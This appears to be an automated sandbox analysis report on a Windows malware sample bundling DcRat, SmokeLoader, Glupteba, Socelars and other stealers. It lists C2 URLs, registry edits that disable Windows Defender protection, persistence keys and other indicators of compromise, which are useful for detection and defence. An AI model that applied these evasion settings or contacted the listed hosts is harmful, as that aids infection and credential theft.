dcrat | 39326cdd0c863e1766ecc3d119ec18fdaa93ef886cfbc887f76784f745df73e4

Resubmissions

19-03-2024 11:39

240319-nsr5psbh4y 10

19-03-2024 04:07

240319-epnhnsha23 10

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
19-03-2024 04:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d52860d6be6ea1ec9f809d6527d46b06.exe
Size

8.5MB
MD5

d52860d6be6ea1ec9f809d6527d46b06
SHA1

9c5a0e6266eca4f86bd38efddc8551e95451158f
SHA256

39326cdd0c863e1766ecc3d119ec18fdaa93ef886cfbc887f76784f745df73e4
SHA512

64d356059ef696a8297a7e0f28b3108ee1a8bdb68edde0b52667fbff1b46e9daf0c42fdc545795443fbe7fe7db6734935d147f01bb3101f1f0d2fdf2e25a6000
SSDEEP

196608:UzE5qkxHYUggVmv8vWkd08L+u3fCbrKtSBJCLSeZ:IE5LiUgsPWC08F3qitSBYlZ

Malware Config

Extracted

Family

ffdroider

http://186.2.171.3

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Botnet

pub2

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Fabookie payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files.exe	family_fabookie

FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider

FFDroider payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4556-136-0x0000000000400000-0x0000000000759000-memory.dmp	family_ffdroider
behavioral2/memory/4556-1249-0x0000000000400000-0x0000000000759000-memory.dmp	family_ffdroider
behavioral2/memory/4556-1935-0x0000000000400000-0x0000000000759000-memory.dmp	family_ffdroider

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2824-139-0x0000000005220000-0x0000000005B46000-memory.dmp	family_glupteba
behavioral2/memory/2824-167-0x0000000000400000-0x00000000030A0000-memory.dmp	family_glupteba
behavioral2/memory/2824-197-0x0000000000400000-0x00000000030A0000-memory.dmp	family_glupteba
behavioral2/memory/2824-198-0x0000000005220000-0x0000000005B46000-memory.dmp	family_glupteba
behavioral2/memory/5140-200-0x0000000000400000-0x00000000030A0000-memory.dmp	family_glupteba
behavioral2/memory/5140-232-0x0000000000400000-0x00000000030A0000-memory.dmp	family_glupteba
behavioral2/memory/6044-237-0x0000000000400000-0x00000000030A0000-memory.dmp	family_glupteba
behavioral2/memory/6044-1374-0x0000000000400000-0x00000000030A0000-memory.dmp	family_glupteba
behavioral2/memory/6044-1419-0x0000000000400000-0x00000000030A0000-memory.dmp	family_glupteba
behavioral2/memory/6044-1624-0x0000000000400000-0x00000000030A0000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

Complete.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Complete.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Complete.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Complete.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Complete.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Complete.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Complete.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Complete.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4008 3480 rUNdlL32.eXe
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4008	3480	rUNdlL32.eXe

Socelars payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1292-119-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/3268-191-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral2/memory/3268-186-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft

Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

5652 netsh.exe

pid	process
5652	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

d52860d6be6ea1ec9f809d6527d46b06.exeFolder.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	d52860d6be6ea1ec9f809d6527d46b06.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	Folder.exe

Executes dropped EXE 16 IoCs

Processes:

Files.exeKRSetp.exeInstall.exeFolder.exeInfo.exeInstallation.exepub2.exemysetold.exejfiag3g_gg.exemd9_1sjm.exeComplete.exeFolder.exejfiag3g_gg.exeInfo.execsrss.exeinjector.exe

pid	process
2412	Files.exe
3744	KRSetp.exe
2428	Install.exe
3592	Folder.exe
2824	Info.exe
4388	Installation.exe
964	pub2.exe
4812	mysetold.exe
1292	jfiag3g_gg.exe
4556	md9_1sjm.exe
3748	Complete.exe
1968	Folder.exe
3268	jfiag3g_gg.exe
5140	Info.exe
6044	csrss.exe
7068	injector.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2228 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2228	rundll32.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
behavioral2/memory/1292-119-0x0000000000400000-0x000000000045B000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
behavioral2/memory/3268-191-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral2/memory/3268-186-0x0000000000400000-0x0000000000422000-memory.dmp	upx

VMProtect packed file 7 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/4556-135-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect
behavioral2/memory/4556-136-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
behavioral2/memory/4556-1249-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect
behavioral2/memory/4556-1935-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Files.exeInfo.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FrostyHill = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

Drops Chrome extension 1 IoCs

Processes:

Install.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

63 iplogger.org
13 iplogger.org
14 iplogger.org
23 iplogger.org
30 iplogger.org
33 iplogger.org
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 ip-api.com
26 ipinfo.io
28 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
63	iplogger.org
13	iplogger.org
14	iplogger.org
23	iplogger.org
30	iplogger.org
33	iplogger.org

flow	ioc
10	ip-api.com
26	ipinfo.io
28	ipinfo.io

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

Info.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN Info.exe
Drops file in Windows directory 2 IoCs

Processes:

Info.exe

description ioc process

File opened for modification C:\Windows\rss Info.exe
File created C:\Windows\rss\csrss.exe Info.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	Info.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Info.exe
File created	C:\Windows\rss\csrss.exe	Info.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2072	2824	WerFault.exe	Info.exe
2676	2824	WerFault.exe	Info.exe
4636	2824	WerFault.exe	Info.exe
5032	2824	WerFault.exe	Info.exe
3280	2228	WerFault.exe	rundll32.exe
4868	2824	WerFault.exe	Info.exe
3868	2824	WerFault.exe	Info.exe
2092	2824	WerFault.exe	Info.exe
4972	2824	WerFault.exe	Info.exe
1180	2824	WerFault.exe	Info.exe
1972	2824	WerFault.exe	Info.exe
2960	2824	WerFault.exe	Info.exe
4988	2824	WerFault.exe	Info.exe
5032	2824	WerFault.exe	Info.exe
2960	2824	WerFault.exe	Info.exe
1692	2824	WerFault.exe	Info.exe
2092	2824	WerFault.exe	Info.exe
1800	2824	WerFault.exe	Info.exe
1564	2824	WerFault.exe	Info.exe
3272	2824	WerFault.exe	Info.exe
1544	2824	WerFault.exe	Info.exe
1932	2824	WerFault.exe	Info.exe
5296	5140	WerFault.exe	Info.exe
5352	5140	WerFault.exe	Info.exe
5396	5140	WerFault.exe	Info.exe
5444	5140	WerFault.exe	Info.exe
5496	5140	WerFault.exe	Info.exe
5528	5140	WerFault.exe	Info.exe
5572	5140	WerFault.exe	Info.exe
5648	5140	WerFault.exe	Info.exe
5796	5140	WerFault.exe	Info.exe
5760	964	WerFault.exe	pub2.exe
5844	5140	WerFault.exe	Info.exe
5940	5140	WerFault.exe	Info.exe
5976	5140	WerFault.exe	Info.exe
6008	5140	WerFault.exe	Info.exe
6044	5140	WerFault.exe	Info.exe
5316	5140	WerFault.exe	Info.exe
4672	5140	WerFault.exe	Info.exe
5520	5140	WerFault.exe	Info.exe
5788	5140	WerFault.exe	Info.exe
5588	5140	WerFault.exe	Info.exe
4080	5140	WerFault.exe	Info.exe
5336	6044	WerFault.exe	csrss.exe
3648	6044	WerFault.exe	csrss.exe
5512	6044	WerFault.exe	csrss.exe
5644	6044	WerFault.exe	csrss.exe
5832	6044	WerFault.exe	csrss.exe
5528	6044	WerFault.exe	csrss.exe
5384	6044	WerFault.exe	csrss.exe
5536	6044	WerFault.exe	csrss.exe
6028	6044	WerFault.exe	csrss.exe
5768	6044	WerFault.exe	csrss.exe
2824	6044	WerFault.exe	csrss.exe
3056	6044	WerFault.exe	csrss.exe
8	6044	WerFault.exe	csrss.exe
5568	6044	WerFault.exe	csrss.exe
5148	6044	WerFault.exe	csrss.exe
6292	6044	WerFault.exe	csrss.exe
6364	6044	WerFault.exe	csrss.exe
6400	6044	WerFault.exe	csrss.exe
3156	6044	WerFault.exe	csrss.exe
6736	6044	WerFault.exe	csrss.exe
6460	6044	WerFault.exe	csrss.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5556 schtasks.exe

pid	process
5556	schtasks.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exemsedge.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 73 Go-http-client/1.1
HTTP User-Agent header 119 Go-http-client/1.1
HTTP User-Agent header 120 Go-http-client/1.1
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5288 taskkill.exe

description	flow	ioc
HTTP User-Agent header	73	Go-http-client/1.1
HTTP User-Agent header	119	Go-http-client/1.1
HTTP User-Agent header	120	Go-http-client/1.1

pid	process
5288	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exeInfo.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	Info.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	Info.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	csrss.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exemsedge.exemsedge.exejfiag3g_gg.exeInfo.exeidentity_helper.exeInfo.exe

pid	process
964	pub2.exe
964	pub2.exe
1184	msedge.exe
1184	msedge.exe
4072	msedge.exe
4072	msedge.exe
3268	jfiag3g_gg.exe
3268	jfiag3g_gg.exe
2824	Info.exe
2824	Info.exe
5612	identity_helper.exe
5612	identity_helper.exe
3536
3536
3536
3536
3536
3536
3536
3536
5140	Info.exe
5140	Info.exe
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
3536
